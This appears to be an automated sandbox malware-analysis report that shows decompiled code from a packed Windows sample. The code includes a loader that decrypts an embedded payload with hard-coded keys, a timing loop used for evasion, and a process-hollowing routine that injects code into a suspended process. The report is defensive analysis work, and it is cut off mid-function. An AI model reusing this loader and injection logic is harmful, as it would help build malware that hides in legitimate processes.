                                                                                                                                                                                            0x00405410
                                                                                                                                                                                            0x00405439
                                                                                                                                                                                            0x004054bf
                                                                                                                                                                                            0x004054ce
                                                                                                                                                                                            0x004054ce
                                                                                                                                                                                            0x0040543b
                                                                                                                                                                                            0x00405446
                                                                                                                                                                                            0x0040544f
                                                                                                                                                                                            0x0040545b
                                                                                                                                                                                            0x00405471
                                                                                                                                                                                            0x0040547e
                                                                                                                                                                                            0x00405499
                                                                                                                                                                                            0x00405499
                                                                                                                                                                                            0x004054da
                                                                                                                                                                                            0x004054eb
                                                                                                                                                                                            0x004054f7
                                                                                                                                                                                            0x0040551f
                                                                                                                                                                                            0x00405bfc
                                                                                                                                                                                            0x00405c05
                                                                                                                                                                                            0x00405c0c
                                                                                                                                                                                            0x00405c17
                                                                                                                                                                                            0x00405c1c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405525
                                                                                                                                                                                            0x00405529
                                                                                                                                                                                            0x00405540
                                                                                                                                                                                            0x0040554c
                                                                                                                                                                                            0x00405568
                                                                                                                                                                                            0x00405576
                                                                                                                                                                                            0x0040557c
                                                                                                                                                                                            0x0040558d
                                                                                                                                                                                            0x004055a6
                                                                                                                                                                                            0x004055b0
                                                                                                                                                                                            0x004055c1
                                                                                                                                                                                            0x004055d3
                                                                                                                                                                                            0x004055ef
                                                                                                                                                                                            0x00405612
                                                                                                                                                                                            0x00405bed
                                                                                                                                                                                            0x00405bf9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405bf9
                                                                                                                                                                                            0x00405628
                                                                                                                                                                                            0x00405634
                                                                                                                                                                                            0x00405637
                                                                                                                                                                                            0x00405646
                                                                                                                                                                                            0x00405658
                                                                                                                                                                                            0x00405670
                                                                                                                                                                                            0x00405687
                                                                                                                                                                                            0x004056a3
                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                            0x004056bb
                                                                                                                                                                                            0x004056c7
                                                                                                                                                                                            0x004056cf
                                                                                                                                                                                            0x004056e3
                                                                                                                                                                                            0x004056fc
                                                                                                                                                                                            0x00405702
                                                                                                                                                                                            0x00405711
                                                                                                                                                                                            0x0040571d
                                                                                                                                                                                            0x00405730
                                                                                                                                                                                            0x00405743
                                                                                                                                                                                            0x0040574f
                                                                                                                                                                                            0x0040576a
                                                                                                                                                                                            0x00405783
                                                                                                                                                                                            0x00405790
                                                                                                                                                                                            0x0040579f
                                                                                                                                                                                            0x004057b3
                                                                                                                                                                                            0x004057c8
                                                                                                                                                                                            0x004057cd
                                                                                                                                                                                            0x004057df
                                                                                                                                                                                            0x004057f8
                                                                                                                                                                                            0x0040580d
                                                                                                                                                                                            0x00405819
                                                                                                                                                                                            0x0040582d
                                                                                                                                                                                            0x0040583a
                                                                                                                                                                                            0x00405849
                                                                                                                                                                                            0x0040585b
                                                                                                                                                                                            0x0040586a
                                                                                                                                                                                            0x00405887
                                                                                                                                                                                            0x0040589e
                                                                                                                                                                                            0x004058a6
                                                                                                                                                                                            0x004058b9
                                                                                                                                                                                            0x004058d1
                                                                                                                                                                                            0x004058e6
                                                                                                                                                                                            0x004058f8
                                                                                                                                                                                            0x00405912
                                                                                                                                                                                            0x0040591a
                                                                                                                                                                                            0x00405931
                                                                                                                                                                                            0x0040594a
                                                                                                                                                                                            0x0040595c
                                                                                                                                                                                            0x0040596f
                                                                                                                                                                                            0x00405985
                                                                                                                                                                                            0x00405999
                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                            0x004059ba
                                                                                                                                                                                            0x004059d0
                                                                                                                                                                                            0x004059e5
                                                                                                                                                                                            0x004059f4
                                                                                                                                                                                            0x004059f7
                                                                                                                                                                                            0x00405a0d
                                                                                                                                                                                            0x00405a26
                                                                                                                                                                                            0x00405a26
                                                                                                                                                                                            0x00405a4e
                                                                                                                                                                                            0x00405bdc
                                                                                                                                                                                            0x00405a54
                                                                                                                                                                                            0x00405a60
                                                                                                                                                                                            0x00405a8b
                                                                                                                                                                                            0x00405aa3
                                                                                                                                                                                            0x00405ab1
                                                                                                                                                                                            0x00405ac5
                                                                                                                                                                                            0x00405adb
                                                                                                                                                                                            0x00405adb
                                                                                                                                                                                            0x00405aed
                                                                                                                                                                                            0x00405b03
                                                                                                                                                                                            0x00405b18
                                                                                                                                                                                            0x00405b1d
                                                                                                                                                                                            0x00405b2e
                                                                                                                                                                                            0x00405b37
                                                                                                                                                                                            0x00405b51
                                                                                                                                                                                            0x00405b5d
                                                                                                                                                                                            0x00405b67
                                                                                                                                                                                            0x00405b7d
                                                                                                                                                                                            0x00405b87
                                                                                                                                                                                            0x00405b91
                                                                                                                                                                                            0x00405ba2
                                                                                                                                                                                            0x00405baa
                                                                                                                                                                                            0x00405bbd
                                                                                                                                                                                            0x00405bbd
                                                                                                                                                                                            0x00405be7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405be7
                                                                                                                                                                                            0x0040551f
                                                                                                                                                                                            0x004052e7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004052e7
                                                                                                                                                                                            0x00405283
                                                                                                                                                                                            0x00404cfe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00404cec
                                                                                                                                                                                            0x00404c9a
                                                                                                                                                                                            0x0040379c
                                                                                                                                                                                            0x004037a6
                                                                                                                                                                                            0x00405ee5
                                                                                                                                                                                            0x00405ef6
                                                                                                                                                                                            0x00405f0a
                                                                                                                                                                                            0x00405f10
                                                                                                                                                                                            0x00405f13
                                                                                                                                                                                            0x00405f14
                                                                                                                                                                                            0x00405f19
                                                                                                                                                                                            0x00405f31
                                                                                                                                                                                            0x00405f3e
                                                                                                                                                                                            0x00405f3e
                                                                                                                                                                                            0x00405f43
                                                                                                                                                                                            0x00405f4c
                                                                                                                                                                                            0x00405f53
                                                                                                                                                                                            0x00405f5b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00405f60

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00403883
                                                                                                                                                                                            • FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,00000022,00000065,?), ref: 00403FDC
                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0040451E
                                                                                                                                                                                            • WritePrinter.WINSPOOL.DRV(?,?,000000F5,?), ref: 004049D7
                                                                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 00404CB4
                                                                                                                                                                                            • FindClosePrinterChangeNotification.WINSPOOL.DRV(?), ref: 00405D9E
                                                                                                                                                                                              • Part of subcall function 004035E0: FindNextPrinterChangeNotification.WINSPOOL.DRV(?,?,?,?), ref: 004035FC
                                                                                                                                                                                              • Part of subcall function 00405F90: FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,000000C0,00000097,?,?), ref: 00405FA8
                                                                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 00403A25
                                                                                                                                                                                              • Part of subcall function 004034C0: FindNextPrinterChangeNotification.WINSPOOL.DRV(?,?,?,?), ref: 004034D6
                                                                                                                                                                                              • Part of subcall function 00403570: FindFirstPrinterChangeNotification.WINSPOOL.DRV(?,000000E9,0000009D,?,?,?,0040350F,?), ref: 00403588
                                                                                                                                                                                            • FindClosePrinterChangeNotification.WINSPOOL.DRV(?), ref: 00405F14
                                                                                                                                                                                              • Part of subcall function 004035B0: ScheduleJob.WINSPOOL.DRV(?,00000068), ref: 004035C2
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ChangeFindNotification.Printer$First$CloseNext$ApisFileFrequencyHeapJob.PerformancePrinter.ProcessQueryScheduleVersionWrite
                                                                                                                                                                                            • String ID: #.$/$A$D$Lq$QY\UPMBHwXRVj\Xlb\aNYnG$SY$Yl77GRFLUv\yB2EF3$de7z0WJA4\fa\yMszmIm$ds$e$i$q
                                                                                                                                                                                            • API String ID: 1791108859-2410147766
                                                                                                                                                                                            • Opcode ID: 8ae20cb46d96bfebb3c0093b768494abcc4d4a57b6eb1f4b5a4cfc2ea8f0b501
                                                                                                                                                                                            • Instruction ID: e46eb3543c0c0c9d4329bdc2546ba549d4d265b0c05a4df7bad6228f03e22152
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ae20cb46d96bfebb3c0093b768494abcc4d4a57b6eb1f4b5a4cfc2ea8f0b501
                                                                                                                                                                                            • Instruction Fuzzy Hash: F853E234A04668CFCB65CF69C890BEDBBB2BF8A301F1481DAD949A7355D6346E84CF14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00414189 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467threadinjectionmemoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 360 414189-414199 361 41477b 360->361 362 41419f-4141a3 360->362 364 41477d-414783 361->364 362->361 363 4141a9-41436b call 414154 * 2 362->363 369 41436d-41438d call 41405f 363->369 369->361 372 414393-414397 369->372 372->369 373 414399 372->373 374 41439b-4143f9 373->374 378 414411-414413 374->378 379 4143fb-414401 374->379 381 414416-414426 378->381 379->378 380 414403-414407 379->380 380->378 382 414409-41440f 380->382 381->361 383 41442c-414438 381->383 382->381 383->361 384 41443e-41444c 383->384 384->361 385 414452-41446f CreateProcessW 384->385 386 414475-414484 GetThreadContext 385->386 387 41473a 385->387 386->387 389 41448a-4144a8 ReadProcessMemory 386->389 388 41473c-414740 387->388 390 414752-414756 388->390 391 414742-41474c 388->391 389->387 392 4144ae-4144b4 389->392 395 414758 390->395 396 41475e-414760 390->396 391->390 393 4144c5-4144dc VirtualAlloc 392->393 394 4144b6-4144bf 392->394 393->387 399 4144e2-4144fa VirtualAllocEx 393->399 394->387 394->393 395->396 397 414762-414768 396->397 398 41476c-414775 396->398 397->398 398->361 398->374 402 41453d-414552 399->402 403 4144fc-4144fe 399->403 408 414582-414591 402->408 409 414554-41455a 402->409 404 414500-414516 403->404 405 414518-41452b 403->405 406 41452c-414537 404->406 405->406 406->387 406->402 412 414597-41459b 408->412 413 414618-41462a WriteProcessMemory 408->413 411 41455c-41457e 409->411 422 414580 411->422 412->413 415 41459d-4145ae 412->415 413->388 416 414630-414647 VirtualProtectEx 413->416 415->413 418 4145b0-4145be 415->418 416->388 419 41464d-414656 416->419 423 414601-414616 418->423 424 4145c0-4145c8 418->424 420 4146c7-4146d3 VirtualFree 419->420 421 414658-41465e 419->421 420->388 428 4146d5-4146ee WriteProcessMemory 420->428 425 414660-414667 421->425 422->408 423->413 423->418 426 4145ca-4145eb 424->426 427 4145ee-4145ff 424->427 429 414682-414684 425->429 430 414669-41466b 425->430 426->427 427->423 427->424 428->388 431 4146f0-41470e SetThreadContext 428->431 434 414686 429->434 435 41468b-414696 429->435 432 414671-414680 430->432 433 41466d-41466f 430->433 431->388 436 414710-41471b ResumeThread 431->436 439 414697-4146b1 VirtualProtectEx 432->439 438 414688-414689 433->438 434->438 435->439 436->388 437 41471d-414721 436->437 440 414723 437->440 441 414729-41472d 437->441 438->439 442 4146b3-4146c3 439->442 443 4146c5 439->443 440->441 444 414735-414738 441->444 445 41472f 441->445 442->425 442->443 443->420 444->364 445->444
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041446A
                                                                                                                                                                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 0041447F
                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004144A0
                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004144D2
                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004144F2
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 00414625
                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 00414642
                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 004146AC
                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004146CE
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004146E9
                                                                                                                                                                                            • SetThreadContext.KERNELBASE(?,00010007), ref: 00414706
                                                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 00414713
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                            • API String ID: 12256240-2746444292
                                                                                                                                                                                            • Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                            • Instruction ID: 7d82b52b3abfa3a090bde65039563ff4697b03c5c3b4b168d9b3f0e6416f9571
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8122971E002199BDF21CFA4CD84BEEBBB5FF44704F1484AAE519E6290E7789A85CF14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00403180 Relevance: 38.7, APIs: 1, Strings: 21, Instructions: 180COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 166 403180-403282 FreeConsole 167 40328d-403291 166->167 168 403351-403366 167->168 169 403297-40334c 167->169 171 403371-403378 168->171 169->167 172 403385-40338c 171->172 173 40337a-403383 171->173 175 403392-40342e call 4018a0 call 401800 call 4029c0 call 401000 call 403140 call 414189 172->175 176 403433-403436 172->176 173->171 187 403430 175->187 187->176
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00403180() {
				int _v12;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				int _v104;
				signed int _v108;
				signed int _v109;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				int _t129;
				intOrPtr _t130;
				void* _t134;
				void* _t137;
				char _t167;
				void* _t180;

				_t129 = FreeConsole(); // executed
				_v80 = 0x9a;
				_v79 = 0x99;
				_v78 = 0x35;
				_v77 = 0x15;
				_v76 = 0x95;
				_v75 = 0xf4;
				_v74 = 0xf4;
				_v73 = 0x94;
				_v72 = 0x11;
				_v71 = 0xb3;
				_v70 = 0xd1;
				_v69 = 0x14;
				_v68 = 0xf3;
				_v67 = 0x77;
				_v66 = 0x13;
				_v65 = 0x6f;
				_v64 = 0xb6;
				_v63 = 0xb5;
				_v62 = 0xd6;
				_v61 = 0x75;
				_v60 = 0xac;
				_v59 = 0xcf;
				_v58 = 0xf2;
				_v57 = 0xce;
				_v56 = 0x55;
				_v55 = 0x4f;
				_v54 = 0x32;
				_v53 = 0x12;
				_v52 = 0xb5;
				_v51 = 0xc;
				_v50 = 0xa;
				_v49 = 0xac;
				_v48 = 0x5a;
				_v47 = 0xa8;
				_v46 = 0x48;
				_v45 = 0xc7;
				_v44 = 0x19;
				_v43 = 0xd2;
				_v42 = 0xa7;
				_v41 = 0xc5;
				_v40 = 0x6d;
				_v39 = 0x17;
				_v38 = 0xb2;
				_v37 = 0x56;
				_v36 = 0xd;
				_v35 = 0x4d;
				_v34 = 0x4d;
				_v33 = 0x32;
				_v32 = 0xce;
				_v31 = 0x43;
				_v30 = 0x23;
				_v29 = 0x5a;
				_v28 = 0x27;
				_v27 = 0xa9;
				_v26 = 0xee;
				_v25 = 0xa4;
				_v24 = 0xf9;
				_v23 = 0xe6;
				_v22 = 0xaa;
				_v108 = 0;
				while(_v108 < 0x3b) {
					_v109 =  *((intOrPtr*)(_t180 + _v108 - 0x4c));
					_v109 = (_v109 & 0x000000ff) >> 0x00000005 | (_v109 & 0x000000ff) << 0x00000003;
					_v109 = (_v109 & 0x000000ff) - 0xca;
					_v109 =  !(_v109 & 0x000000ff);
					_v109 = (_v109 & 0x000000ff) - _v108;
					_v109 = _v109 & 0x000000ff ^ _v108;
					_v109 = (_v109 & 0x000000ff) - _v108;
					_v109 = _v109 & 0x000000ff ^ 0x000000f3;
					_v109 =  ~(_v109 & 0x000000ff);
					_v109 = _v109 & 0x000000ff ^ _v108;
					_v109 = (_v109 & 0x000000ff) + 0x4a;
					_v109 = _v109 & 0x000000ff ^ _v108;
					_v109 =  ~(_v109 & 0x000000ff);
					_v109 = (_v109 & 0x000000ff) - _v108;
					_v109 =  !(_v109 & 0x000000ff);
					_v109 = (_v109 & 0x000000ff) - _v108;
					_t167 = _v109;
					 *((char*)(_t180 + _v108 - 0x4c)) = _t167;
					_t129 = _v108 + 1;
					_v108 = _t129;
				}
				_v104 = 0;
				_v12 = 0;
				_v12 = 0;
				while(_v12 < 0x275c1) {
					_v104 = _v104 + 1;
					_t129 = _v12 + 1;
					_v12 = _t129;
				}
				if(_v104 == 0x275c1) {
					_v148 = 0;
					_v124 = 0;
					_v144 = 0x590813;
					_v120 =  *0x410b60;
					_v140 = 0;
					_t130 = E004018A0(_t129,  &E00414008, 0x77e); // executed
					_v132 = _t130;
					_v128 = _t167;
					_v116 = E004029C0(E00401800("POV4hp3Hy7tF1r2mRcyJQShwuYLPyzbthqZzNp7CCyGFyKvyRJlHqw85jP5SCwXdkLDIkFB2K7r75g0fQpJlsAHiCg",  &E00414008, 0x77e, 0x5b));
					E00401000(_t132, "RCIQBtiW8MmD6t8dGH1NYhsgS0ukDxQMA7SGoU9l9ZL80gcXtklbmWlFEEvlXnOtvfHqg6ro67U1XREOfMpREVkKTM", 0x414788, 0x22400);
					_t134 = E00403140( &_v80); // executed
					_t137 =  *((intOrPtr*)(_v116 +  &E00414008))(_t134, 0, 0x414788, 0x5b); // executed
					return _t137;
				}
				return _t129;
			}
















































































                                                                                                                                                                                            0x00403189
                                                                                                                                                                                            0x0040318f
                                                                                                                                                                                            0x00403193
                                                                                                                                                                                            0x00403197
                                                                                                                                                                                            0x0040319b
                                                                                                                                                                                            0x0040319f
                                                                                                                                                                                            0x004031a3
                                                                                                                                                                                            0x004031a7
                                                                                                                                                                                            0x004031ab
                                                                                                                                                                                            0x004031af
                                                                                                                                                                                            0x004031b3
                                                                                                                                                                                            0x004031b7
                                                                                                                                                                                            0x004031bb
                                                                                                                                                                                            0x004031bf
                                                                                                                                                                                            0x004031c3
                                                                                                                                                                                            0x004031c7
                                                                                                                                                                                            0x004031cb
                                                                                                                                                                                            0x004031cf
                                                                                                                                                                                            0x004031d3
                                                                                                                                                                                            0x004031d7
                                                                                                                                                                                            0x004031db
                                                                                                                                                                                            0x004031df
                                                                                                                                                                                            0x004031e3
                                                                                                                                                                                            0x004031e7
                                                                                                                                                                                            0x004031eb
                                                                                                                                                                                            0x004031ef
                                                                                                                                                                                            0x004031f3
                                                                                                                                                                                            0x004031f7
                                                                                                                                                                                            0x004031fb
                                                                                                                                                                                            0x004031ff
                                                                                                                                                                                            0x00403203
                                                                                                                                                                                            0x00403207
                                                                                                                                                                                            0x0040320b
                                                                                                                                                                                            0x0040320f
                                                                                                                                                                                            0x00403213
                                                                                                                                                                                            0x00403217
                                                                                                                                                                                            0x0040321b
                                                                                                                                                                                            0x0040321f
                                                                                                                                                                                            0x00403223
                                                                                                                                                                                            0x00403227
                                                                                                                                                                                            0x0040322b
                                                                                                                                                                                            0x0040322f
                                                                                                                                                                                            0x00403233
                                                                                                                                                                                            0x00403237
                                                                                                                                                                                            0x0040323b
                                                                                                                                                                                            0x0040323f
                                                                                                                                                                                            0x00403243
                                                                                                                                                                                            0x00403247
                                                                                                                                                                                            0x0040324b
                                                                                                                                                                                            0x0040324f
                                                                                                                                                                                            0x00403253
                                                                                                                                                                                            0x00403257
                                                                                                                                                                                            0x0040325b
                                                                                                                                                                                            0x0040325f
                                                                                                                                                                                            0x00403263
                                                                                                                                                                                            0x00403267
                                                                                                                                                                                            0x0040326b
                                                                                                                                                                                            0x0040326f
                                                                                                                                                                                            0x00403273
                                                                                                                                                                                            0x00403277
                                                                                                                                                                                            0x0040327b
                                                                                                                                                                                            0x0040328d
                                                                                                                                                                                            0x0040329e
                                                                                                                                                                                            0x004032b1
                                                                                                                                                                                            0x004032be
                                                                                                                                                                                            0x004032c7
                                                                                                                                                                                            0x004032d1
                                                                                                                                                                                            0x004032db
                                                                                                                                                                                            0x004032e5
                                                                                                                                                                                            0x004032f2
                                                                                                                                                                                            0x004032fb
                                                                                                                                                                                            0x00403305
                                                                                                                                                                                            0x0040330f
                                                                                                                                                                                            0x00403319
                                                                                                                                                                                            0x00403322
                                                                                                                                                                                            0x0040332c
                                                                                                                                                                                            0x00403335
                                                                                                                                                                                            0x0040333f
                                                                                                                                                                                            0x00403345
                                                                                                                                                                                            0x00403348
                                                                                                                                                                                            0x00403287
                                                                                                                                                                                            0x0040328a
                                                                                                                                                                                            0x0040328a
                                                                                                                                                                                            0x00403351
                                                                                                                                                                                            0x00403358
                                                                                                                                                                                            0x0040335f
                                                                                                                                                                                            0x00403371
                                                                                                                                                                                            0x00403380
                                                                                                                                                                                            0x0040336b
                                                                                                                                                                                            0x0040336e
                                                                                                                                                                                            0x0040336e
                                                                                                                                                                                            0x0040338c
                                                                                                                                                                                            0x00403392
                                                                                                                                                                                            0x0040339c
                                                                                                                                                                                            0x004033a3
                                                                                                                                                                                            0x004033b3
                                                                                                                                                                                            0x004033b6
                                                                                                                                                                                            0x004033ca
                                                                                                                                                                                            0x004033d2
                                                                                                                                                                                            0x004033d5
                                                                                                                                                                                            0x004033f6
                                                                                                                                                                                            0x0040340a
                                                                                                                                                                                            0x0040341d
                                                                                                                                                                                            0x0040342e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403430
                                                                                                                                                                                            0x00403436

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleFree
                                                                                                                                                                                            • String ID: #$'$2$2$5$;$C$H$M$M$O$POV4hp3Hy7tF1r2mRcyJQShwuYLPyzbthqZzNp7CCyGFyKvyRJlHqw85jP5SCwXdkLDIkFB2K7r75g0fQpJlsAHiCg$RCIQBtiW8MmD6t8dGH1NYhsgS0ukDxQMA7SGoU9l9ZL80gcXtklbmWlFEEvlXnOtvfHqg6ro67U1XREOfMpREVkKTM$U$V$Z$Z$m$o$u$w
                                                                                                                                                                                            • API String ID: 771614528-1928178049
                                                                                                                                                                                            • Opcode ID: 201285a32bab26850b9d6ae3d34b33511898034da1b3a26e99d0f912af0b52a8
                                                                                                                                                                                            • Instruction ID: a9f4db38adb6773be6d368baaa60883427108d02990b535e66ec9317f0dc76b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 201285a32bab26850b9d6ae3d34b33511898034da1b3a26e99d0f912af0b52a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F91EE20D087D98ADF22CBFD98547DDBFB15F27225F184289E4E87B2D2C2690285C766
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004018A0 Relevance: 30.9, APIs: 3, Strings: 14, Instructions: 1132librarymemoryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E004018A0(signed int __eax, void* _a4, long _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				struct HINSTANCE__* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				signed int _v113;
				signed int _v120;
				signed int _v121;
				signed char _t648;
				void* _t746;

				_t648 = __eax;
				_v80 =  *0x410938;
				_v80 =  *0x410934;
				_v80 =  *0x410930;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v80 =  *0x41092c;
					_v80 =  *0x410928;
				}
				_v80 =  *0x410924;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v80 =  *0x410920;
					_v80 =  *0x41091c;
				}
				_v80 =  *0x410918;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v80 =  *0x410914;
					_v80 =  *0x410910;
				}
				_v80 =  *0x41090c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v80 =  *0x410908;
					_v80 =  *0x410904;
				}
				_v80 =  *0x410900;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v80 =  *0x4108fc;
					_v80 =  *0x4108f8;
				}
				_v108 =  *0x4108f4;
				_v108 =  *0x4108f0;
				_v108 =  *0x4108ec;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
